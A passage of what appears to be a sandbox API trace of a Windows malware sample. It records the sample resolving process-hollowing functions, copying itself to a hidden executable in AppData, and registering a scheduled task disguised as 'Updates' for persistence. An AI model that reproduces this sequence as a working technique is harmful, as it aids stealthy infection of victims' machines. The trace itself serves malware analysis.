[0289.385] GetProcAddress (hModule=0x76b60000, lpProcName="VirtualAllocEx") returned 0x76ba2730 [0289.385] CoTaskMemFree (pv=0x9e16e0) [0289.399] CoTaskMemAlloc (cb=0xd) returned 0x974668 [0289.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23858b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0289.399] LoadLibraryA (lpLibFileName="kernel32") returned 0x76b60000 [0289.399] CoTaskMemFree (pv=0x974668) [0289.399] CoTaskMemAlloc (cb=0x17) returned 0x9e18c0 [0289.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteProcessMemory", cchWideChar=18, lpMultiByteStr=0x23858f0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteProcessMemory", lpUsedDefaultChar=0x0) returned 18 [0289.400] GetProcAddress (hModule=0x76b60000, lpProcName="WriteProcessMemory") returned 0x76ba2850 [0289.400] CoTaskMemFree (pv=0x9e18c0) [0289.484] CoTaskMemAlloc (cb=0xd) returned 0x9746b0 [0289.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23859b4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0289.485] LoadLibraryA (lpLibFileName="kernel32") returned 0x76b60000 [0289.485] CoTaskMemFree (pv=0x9746b0) [0289.485] CoTaskMemAlloc (cb=0x16) returned 0x9e1760 [0289.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReadProcessMemory", cchWideChar=17, lpMultiByteStr=0x23859ec, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadProcessMemory", lpUsedDefaultChar=0x0) returned 17 [0289.485] GetProcAddress (hModule=0x76b60000, lpProcName="ReadProcessMemory") returned 0x76ba1c80 [0289.486] CoTaskMemFree (pv=0x9e1760) [0289.561] CoTaskMemAlloc (cb=0xa) returned 0x9746f8 [0289.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ntdll", cchWideChar=5, lpMultiByteStr=0x2385aac, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll", lpUsedDefaultChar=0x0) returned 5 [0289.561] LoadLibraryA (lpLibFileName="ntdll") returned 0x77840000 [0289.562] CoTaskMemFree (pv=0x9746f8) [0289.562] CoTaskMemAlloc (cb=0x19) returned 0x97b3c8 [0289.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZwUnmapViewOfSection", cchWideChar=20, lpMultiByteStr=0x2385ad8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZwUnmapViewOfSection", lpUsedDefaultChar=0x0) returned 20 [0289.562] GetProcAddress (hModule=0x77840000, lpProcName="ZwUnmapViewOfSection") returned 0x778b6f40 [0289.562] CoTaskMemFree (pv=0x97b3c8) [0289.571] CoTaskMemAlloc (cb=0xd) returned 0x9746c8 [0289.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x2385ba0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0289.571] LoadLibraryA (lpLibFileName="kernel32") returned 0x76b60000 [0289.572] CoTaskMemFree (pv=0x9746c8) [0289.572] CoTaskMemAlloc (cb=0x13) returned 0x9e1580 [0289.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateProcessA", cchWideChar=14, lpMultiByteStr=0x2385bd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateProcessA", lpUsedDefaultChar=0x0) returned 14 [0289.572] GetProcAddress (hModule=0x76b60000, lpProcName="CreateProcessA") returned 0x76ba0750 [0289.572] CoTaskMemFree (pv=0x9e1580) [0289.714] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", nBufferLength=0x105, lpBuffer=0x18d9b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", lpFilePart=0x0) returned 0x34 [0289.777] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="jXwztFZgjbeeUxrVPcVRAVtAjVu") returned 0x0 [0289.845] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="jXwztFZgjbeeUxrVPcVRAVtAjVu") returned 0x2d8 [0290.146] GetCurrentProcess () returned 0xffffffff [0290.146] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ded0 | out: TokenHandle=0x18ded0*=0x2fc) returned 1 [0290.162] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18dec8 | out: TokenInformation=0x0, ReturnLength=0x18dec8) returned 0 [0290.163] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x96c930 [0290.163] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0x8, TokenInformation=0x96c930, TokenInformationLength=0x4, ReturnLength=0x18dec8 | out: TokenInformation=0x96c930, ReturnLength=0x18dec8) returned 1 [0290.983] LocalFree (hMem=0x96c930) returned 0x0 [0292.525] DuplicateTokenEx (in: hExistingToken=0x2fc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18ded0 | out: phNewToken=0x18ded0*=0x30c) returned 1 [0292.526] CheckTokenMembership (in: TokenHandle=0x30c, SidToCheck=0x23867e8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18dee0 | out: IsMember=0x18dee0) returned 1 [0292.526] CloseHandle (hObject=0x30c) returned 1 [0293.343] CoTaskMemAlloc (cb=0x20c) returned 0x9ecb40 [0293.343] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9ecb40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0293.359] CoTaskMemFree (pv=0x9ecb40) [0293.359] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x18d998, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0293.781] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", nBufferLength=0x105, lpBuffer=0x18da2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", lpFilePart=0x0) returned 0x34 [0293.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18ded4) returned 1 [0293.782] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\xafodrmisc.exe"), fInfoLevelId=0x0, lpFileInformation=0x18df50 | out: lpFileInformation=0x18df50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0293.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18ded0) returned 1 [0293.913] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", nBufferLength=0x105, lpBuffer=0x18d9ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", lpFilePart=0x0) returned 0x34 [0294.069] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", nBufferLength=0x105, lpBuffer=0x18da00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", lpFilePart=0x0) returned 0x34 [0294.078] SetNamedSecurityInfoW () returned 0x2 [0294.489] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", nBufferLength=0x105, lpBuffer=0x18d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", lpFilePart=0x0) returned 0x34 [0294.490] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", nBufferLength=0x105, lpBuffer=0x18d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", lpFilePart=0x0) returned 0x34 [0294.491] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\alpha73882.scr"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\xafodrmisc.exe"), bFailIfExists=1) returned 1 [0294.936] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", nBufferLength=0x105, lpBuffer=0x18d988, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", lpFilePart=0x0) returned 0x34 [0294.939] GetUserNameW (in: lpBuffer=0x18dc7c, pcbBuffer=0x18def4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18def4) returned 1 [0294.986] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", dwFileAttributes=0x2007) returned 1 [0295.000] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18dd04, DesiredAccess=0x800, PolicyHandle=0x18dcc4 | out: PolicyHandle=0x18dcc4) returned 0x0 [0295.007] CoTaskMemAlloc (cb=0x8) returned 0x96c940 [0295.008] CoTaskMemAlloc (cb=0x1a) returned 0x97b918 [0295.008] LsaLookupNames2 (in: PolicyHandle=0x9e16a0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x18dcd8, Sids=0x18dccc | out: ReferencedDomains=0x18dcd8, Sids=0x18dccc) returned 0x0 [0295.070] CoTaskMemFree (pv=0x97b918) [0295.070] CoTaskMemFree (pv=0x96c940) [0295.078] LsaClose (ObjectHandle=0x9e16a0) returned 0x0 [0295.078] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.078] LsaFreeMemory (Buffer=0x93cff0) returned 0x0 [0295.078] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18dd04, DesiredAccess=0x800, PolicyHandle=0x18dcc4 | out: PolicyHandle=0x18dcc4) returned 0x0 [0295.079] CoTaskMemAlloc (cb=0x8) returned 0x96c940 [0295.079] CoTaskMemAlloc (cb=0x1a) returned 0x97bcd8 [0295.079] LsaLookupNames2 (in: PolicyHandle=0x9e17e0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x18dcd8, Sids=0x18dccc | out: ReferencedDomains=0x18dcd8, Sids=0x18dccc) returned 0x0 [0295.083] CoTaskMemFree (pv=0x97bcd8) [0295.083] CoTaskMemFree (pv=0x96c940) [0295.083] LsaClose (ObjectHandle=0x9e17e0) returned 0x0 [0295.084] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.084] LsaFreeMemory (Buffer=0x93cff0) returned 0x0 [0295.088] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18dd04, DesiredAccess=0x800, PolicyHandle=0x18dcc4 | out: PolicyHandle=0x18dcc4) returned 0x0 [0295.088] CoTaskMemAlloc (cb=0x8) returned 0x96c890 [0295.088] CoTaskMemAlloc (cb=0x1a) returned 0x97bd00 [0295.088] LsaLookupNames2 (in: PolicyHandle=0x9e15c0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x18dcd8, Sids=0x18dccc | out: ReferencedDomains=0x18dcd8, Sids=0x18dccc) returned 0x0 [0295.089] CoTaskMemFree (pv=0x97bd00) [0295.090] CoTaskMemFree (pv=0x96c890) [0295.090] LsaClose (ObjectHandle=0x9e15c0) returned 0x0 [0295.090] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.090] LsaFreeMemory (Buffer=0x93cee8) returned 0x0 [0295.090] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18dd04, DesiredAccess=0x800, PolicyHandle=0x18dcc4 | out: PolicyHandle=0x18dcc4) returned 0x0 [0295.091] CoTaskMemAlloc (cb=0x8) returned 0x96c890 [0295.091] CoTaskMemAlloc (cb=0x1a) returned 0x97baa8 [0295.091] LsaLookupNames2 (in: PolicyHandle=0x9e17c0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x18dcd8, Sids=0x18dccc | out: ReferencedDomains=0x18dcd8, Sids=0x18dccc) returned 0x0 [0295.092] CoTaskMemFree (pv=0x97baa8) [0295.092] CoTaskMemFree (pv=0x96c890) [0295.092] LsaClose (ObjectHandle=0x9e17c0) returned 0x0 [0295.093] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.093] LsaFreeMemory (Buffer=0x93d410) returned 0x0 [0295.093] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18dd04, DesiredAccess=0x800, PolicyHandle=0x18dcc4 | out: PolicyHandle=0x18dcc4) returned 0x0 [0295.093] CoTaskMemAlloc (cb=0x8) returned 0x96c9a0 [0295.093] CoTaskMemAlloc (cb=0x1a) returned 0x97ba80 [0295.093] LsaLookupNames2 (in: PolicyHandle=0x9e16a0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x18dcd8, Sids=0x18dccc | out: ReferencedDomains=0x18dcd8, Sids=0x18dccc) returned 0x0 [0295.094] CoTaskMemFree (pv=0x97ba80) [0295.094] CoTaskMemFree (pv=0x96c9a0) [0295.095] LsaClose (ObjectHandle=0x9e16a0) returned 0x0 [0295.095] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.095] LsaFreeMemory (Buffer=0x93d410) returned 0x0 [0295.095] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18dd04, DesiredAccess=0x800, PolicyHandle=0x18dcc4 | out: PolicyHandle=0x18dcc4) returned 0x0 [0295.095] CoTaskMemAlloc (cb=0x8) returned 0x96c890 [0295.096] CoTaskMemAlloc (cb=0x1a) returned 0x97bcd8 [0295.096] LsaLookupNames2 (in: PolicyHandle=0x9e1600, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x18dcd8, Sids=0x18dccc | out: ReferencedDomains=0x18dcd8, Sids=0x18dccc) returned 0x0 [0295.260] CoTaskMemFree (pv=0x97bcd8) [0295.260] CoTaskMemFree (pv=0x96c890) [0295.261] LsaClose (ObjectHandle=0x9e1600) returned 0x0 [0295.261] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.261] LsaFreeMemory (Buffer=0x93cf98) returned 0x0 [0295.262] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18dd04, DesiredAccess=0x800, PolicyHandle=0x18dcc4 | out: PolicyHandle=0x18dcc4) returned 0x0 [0295.262] CoTaskMemAlloc (cb=0x8) returned 0x96c950 [0295.262] CoTaskMemAlloc (cb=0x1a) returned 0x97b940 [0295.262] LsaLookupNames2 (in: PolicyHandle=0x9e1700, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x18dcd8, Sids=0x18dccc | out: ReferencedDomains=0x18dcd8, Sids=0x18dccc) returned 0x0 [0295.264] CoTaskMemFree (pv=0x97b940) [0295.264] CoTaskMemFree (pv=0x96c950) [0295.264] LsaClose (ObjectHandle=0x9e1700) returned 0x0 [0295.265] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.265] LsaFreeMemory (Buffer=0x93cd88) returned 0x0 [0295.265] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18dd04, DesiredAccess=0x800, PolicyHandle=0x18dcc4 | out: PolicyHandle=0x18dcc4) returned 0x0 [0295.265] CoTaskMemAlloc (cb=0x8) returned 0x96c890 [0295.265] CoTaskMemAlloc (cb=0x1a) returned 0x97bcd8 [0295.266] LsaLookupNames2 (in: PolicyHandle=0x9e15e0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x18dcd8, Sids=0x18dccc | out: ReferencedDomains=0x18dcd8, Sids=0x18dccc) returned 0x0 [0295.267] CoTaskMemFree (pv=0x97bcd8) [0295.267] CoTaskMemFree (pv=0x96c890) [0295.267] LsaClose (ObjectHandle=0x9e15e0) returned 0x0 [0295.267] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.267] LsaFreeMemory (Buffer=0x93cd88) returned 0x0 [0295.267] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18dd04, DesiredAccess=0x800, PolicyHandle=0x18dcc4 | out: PolicyHandle=0x18dcc4) returned 0x0 [0295.270] CoTaskMemAlloc (cb=0x8) returned 0x96c900 [0295.270] CoTaskMemAlloc (cb=0x1a) returned 0x97bcd8 [0295.270] LsaLookupNames2 (in: PolicyHandle=0x9e1800, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x18dcd8, Sids=0x18dccc | out: ReferencedDomains=0x18dcd8, Sids=0x18dccc) returned 0x0 [0295.271] CoTaskMemFree (pv=0x97bcd8) [0295.271] CoTaskMemFree (pv=0x96c900) [0295.272] LsaClose (ObjectHandle=0x9e1800) returned 0x0 [0295.272] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.272] LsaFreeMemory (Buffer=0x93cf98) returned 0x0 [0295.272] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", nBufferLength=0x105, lpBuffer=0x18d99c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xaFodrmIsC.exe", lpFilePart=0x0) returned 0x34 [0295.272] SetNamedSecurityInfoW () returned 0x0 [0295.452] GetCurrentProcess () returned 0xffffffff [0295.452] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18de48 | out: TokenHandle=0x18de48*=0x3c0) returned 1 [0295.452] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18de40 | out: TokenInformation=0x0, ReturnLength=0x18de40) returned 0 [0295.453] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x96c8d0 [0295.453] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x8, TokenInformation=0x96c8d0, TokenInformationLength=0x4, ReturnLength=0x18de40 | out: TokenInformation=0x96c8d0, ReturnLength=0x18de40) returned 1 [0295.453] LocalFree (hMem=0x96c8d0) returned 0x0 [0295.453] DuplicateTokenEx (in: hExistingToken=0x3c0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18de48 | out: phNewToken=0x18de48*=0x3c4) returned 1 [0295.454] CheckTokenMembership (in: TokenHandle=0x3c4, SidToCheck=0x23ddfe4*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18de58 | out: IsMember=0x18de58) returned 1 [0295.454] CloseHandle (hObject=0x3c4) returned 1 [0295.460] GetCurrentProcess () returned 0xffffffff [0295.460] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18de94 | out: TokenHandle=0x18de94*=0x3c4) returned 1 [0295.466] GetCurrentProcess () returned 0xffffffff [0295.466] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18de64 | out: TokenHandle=0x18de64*=0x3c8) returned 1 [0295.466] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18de98 | out: TokenInformation=0x0, ReturnLength=0x18de98) returned 0 [0295.466] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x9e2c58 [0295.466] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x9e2c58, TokenInformationLength=0x24, ReturnLength=0x18de98 | out: TokenInformation=0x9e2c58, ReturnLength=0x18de98) returned 1 [0295.467] LocalFree (hMem=0x9e2c58) returned 0x0 [0295.467] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x18ddb4, DesiredAccess=0x800, PolicyHandle=0x18dd74 | out: PolicyHandle=0x18dd74) returned 0x0 [0295.469] LsaLookupSids (in: PolicyHandle=0x9e16a0, Count=0x1, Sids=0x23de30c*=0x23de2b0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), ReferencedDomains=0x18dd90, Names=0x18dd84 | out: ReferencedDomains=0x18dd90, Names=0x18dd84) returned 0x0 [0295.470] LsaClose (ObjectHandle=0x9e16a0) returned 0x0 [0295.473] LsaFreeMemory (Buffer=0x95f360) returned 0x0 [0295.473] LsaFreeMemory (Buffer=0x9e1dc8) returned 0x0 [0295.478] CoTaskMemAlloc (cb=0x20c) returned 0x974768 [0295.478] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x974768 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0295.478] CoTaskMemFree (pv=0x974768) [0295.479] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x18d990, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0295.480] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x18d9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29 [0295.480] CoTaskMemAlloc (cb=0x20c) returned 0x974768 [0295.480] GetTempFileNameW (in: lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x974768 | out: lpTempFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmpb75d.tmp")) returned 0xb75d [0295.482] CoTaskMemFree (pv=0x974768) [0295.556] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp", nBufferLength=0x105, lpBuffer=0x18d854, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp", lpFilePart=0x0) returned 0x34 [0295.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18dd8c) returned 1 [0295.556] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmpb75d.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3cc [0295.557] GetFileType (hFile=0x3cc) returned 0x1 [0295.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18dd88) returned 1 [0295.557] GetFileType (hFile=0x3cc) returned 0x1 [0295.559] WriteFile (in: hFile=0x3cc, lpBuffer=0x23e2188*, nNumberOfBytesToWrite=0x63e, lpNumberOfBytesWritten=0x18de18, lpOverlapped=0x0 | out: lpBuffer=0x23e2188*, lpNumberOfBytesWritten=0x18de18*=0x63e, lpOverlapped=0x0) returned 1 [0295.560] CloseHandle (hObject=0x3cc) returned 1 [0295.861] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x97bb48 [0295.861] LocalAlloc (uFlags=0x0, uBytes=0xba) returned 0x9e6b58 [0295.863] ShellExecuteExW (in: pExecInfo=0x23e34dc*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\xaFodrmIsC\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x23e34dc*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\xaFodrmIsC\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x4f0)) returned 1 [0301.051] LocalFree (hMem=0x97bb48) returned 0x0 [0301.055] LocalFree (hMem=0x9e6b58) returned 0x0 [0301.159] GetCurrentProcess () returned 0xffffffff [0301.159] GetCurrentProcess () returned 0xffffffff [0301.159] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x18de7c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18de7c*=0x47c) returned 1 [0301.161] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18de74*=0x47c, lpdwindex=0x18dc94 | out: lpdwindex=0x18dc94) returned 0x0 [0313.440] CloseHandle (hObject=0x47c) returned 1 [0313.445] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp", nBufferLength=0x105, lpBuffer=0x18d9b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp", lpFilePart=0x0) returned 0x34 [0313.446] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmpb75d.tmp")) returned 1 [0314.090] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", nBufferLength=0x105, lpBuffer=0x18d920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", lpFilePart=0x0) returned 0x34 [0314.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x18d3ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0314.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", cchWideChar=52, lpMultiByteStr=0x18dc30, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr\x0ey\x1f\x02Ð~\x09", lpUsedDefaultChar=0x0) returned 52 [0314.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x18dc2c, cbMultiByte=2, lpDefaultChar=0x0, 